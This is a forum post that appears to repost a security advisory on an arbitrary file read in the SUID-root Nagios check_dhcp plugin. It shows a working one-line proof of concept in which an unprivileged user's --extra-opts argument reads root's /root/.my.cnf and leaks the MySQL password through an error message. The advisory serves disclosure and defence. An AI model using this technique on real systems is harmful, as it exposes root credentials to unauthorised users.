Announcement Announcement Module
No announcement yet.
Nagios Plugins check_dhcp Arbitrary File Read Page Title Module
Move Remove Collapse
Conversation Detail Module
  • Filter
  • Time
  • Show
Clear All
new posts

  • Nagios Plugins check_dhcp Arbitrary File Read

    Nagios plugin check_dhcp requires a root SUID permission on the program binary file in order to run
    correctly. Default installation of check_dhcp will set SUID permission automatically.

    # ./configure ; make ; make install

    # ls -l /usr/local/nagios/libexec/check_dhcp
    -r-sr-xr-x 1 root root 171188 May 12 23:26 /usr/local/nagios/libexec/check_dhcp

    As we can see in the provided help the plugin allows for reading options from a
    supplied config file by using --extra-opts option:

    # /usr/local/nagios/libexec/check_dhcp --help
    check_dhcp v2.0.1 (nagios-plugins 2.0.1)
    check_dhcp [-v] [-u] [-s serverip] [-r requestedip] [-t timeout]
    [-i interface] [-m mac]

    Read options from an ini file. See
    for usage and examples.

    The option could be used to read parts of any INI format config files
    available on the system. Because check_dhcp is running as root (thanks
    to SETUID bit) and does not drop the root privileges when accessing the
    config file nor does it check if a given file should be accessible by the
    user executing it any root ini-config file can be accessed this way by an
    unprivileged user on the local system.


    A good example of a program that stores configuration in INI format is MySQL.
    Administrators often save mysql credentials in /root/.my.cnf to avoid having
    to type them each time when running a mysql client. Storing mysql passwords in
    a config file is also suggested for safety in MySQL docs :

    An example mysql config file could look like this:
    root@server [~]# cat /root/.my.cnf
    If an unprivileged user can access to a system containing SUID binary of
    check_dhcp plugin he could easily use it to retrieve the password contained
    in /root/.my.cnf file:

    prajith@server[~]$ id
    uid=1000(prajith) gid=1000(prajith) groups=1000(prajith)

    [prajith@server[~]$ /usr/local/nagios/libexec/check_dhcp -v --extra-opts=client@/root/.my.cnf
    /usr/local/nagios/libexec/check_dhcp: unrecognized option '--password=nzk?V5l-'
    check_dhcp [-v] [-u] [-s serverip] [-r requestedip] [-t timeout]
    [-i interface] [-m mac]

    As we can see the contents of the 'client' section of /root/.my.cnf option
    file gets printed as a part of the error message.


    The vulnerability has been discovered by legalhackers